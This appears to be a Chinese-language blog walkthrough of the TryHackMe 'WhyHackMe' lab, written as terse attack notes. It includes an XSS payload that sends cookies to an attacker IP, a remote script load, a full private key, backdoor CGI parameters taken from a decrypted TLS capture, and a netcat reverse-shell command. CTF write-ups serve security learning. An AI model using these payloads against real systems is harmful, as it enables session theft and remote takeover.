WhyHackMe

发表于2024-06-07|更新于2024-06-08|TryHackMe

|字数总计:548|阅读时长:3分钟

ftp
Pasted%20image%2020240210105441

<script>fetch("http://10.17.6.173:9000",{method: "POST", body: document.cookie});</script>

注册时候xss,文件在kali的css文件夹里
<script src=http://10.17.6.173:9000/exfil.js></script>

Pasted%20image%2020240210112436

怎么找到的

Pasted%20image%2020240210112539

这就是给iptables sudo权限的原因吗

sudo /usr/sbin/iptables -L --line-numbers
sudo /usr/sbin/iptables -D INPUT
sudo /usr/sbin/iptables -I INPUT -p tcp --dport 41312 -j ACCEPT

find / -name "*.key" 2> /dev/null
流量是tls,先找密钥

-----BEGIN PRIVATE KEY-----
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
8zgwXPatVQA2vA1aN1A1anOcmGZPQg==
-----END PRIVATE KEY-----

Pasted%20image%2020240210115219
导入tls证书

Frame 69: 631 bytes on wire (5048 bits), 631 bytes captured (5048 bits)
Ethernet II, Src: PCSSystemtec_65:c7:bf (08:00:27:65:c7:bf), Dst: PCSSystemtec_7f:2f:1d (08:00:27:7f:2f:1d)
Internet Protocol Version 4, Src: 10.133.71.33, Dst: 10.13.64.69
Transmission Control Protocol, Src Port: 58654, Dst Port: 41312, Seq: 1116, Ack: 1660, Len: 565
Transport Layer Security
Hypertext Transfer Protocol
    GET /cgi-bin/5UP3r53Cr37.py?key=48pfPHUrj4pmHzrC&iv=VZukhsCo8TlTXORN&cmd=id HTTP/1.1\r\n
        [Expert Info (Chat/Sequence): GET /cgi-bin/5UP3r53Cr37.py?key=48pfPHUrj4pmHzrC&iv=VZukhsCo8TlTXORN&cmd=id HTTP/1.1\r\n]
        Request Method: GET
        Request URI: /cgi-bin/5UP3r53Cr37.py?key=48pfPHUrj4pmHzrC&iv=VZukhsCo8TlTXORN&cmd=id
        Request Version: HTTP/1.1
    Host: 10.0.2.15:41312\r\n
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0\r\n
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\r\n
    Accept-Language: en-US,en;q=0.5\r\n
    Accept-Encoding: gzip, deflate, br\r\n
    DNT: 1\r\n
    Connection: keep-alive\r\n
    Upgrade-Insecure-Requests: 1\r\n
    Sec-Fetch-Dest: document\r\n
    Sec-Fetch-Mode: navigate\r\n
    Sec-Fetch-Site: none\r\n
    Sec-Fetch-User: ?1\r\n
    \r\n
    [Full request URI: https://10.0.2.15:41312/cgi-bin/5UP3r53Cr37.py?key=48pfPHUrj4pmHzrC&iv=VZukhsCo8TlTXORN&cmd=id]
    [HTTP request 1/1]
    [Response in frame: 71]

https://10.10.239.33:41312/cgi-bin/5UP3r53Cr37.py?key=48pfPHUrj4pmHzrC&iv=VZukhsCo8TlTXORN&cmd=id

记得是https,直接拿下
https://10.10.239.33:41312/cgi-bin/5UP3r53Cr37.py?key=48pfPHUrj4pmHzrC&iv=VZukhsCo8TlTXORN&cmd=busybox nc 10.17.6.173 9999 -e bash

sudo -l直接提权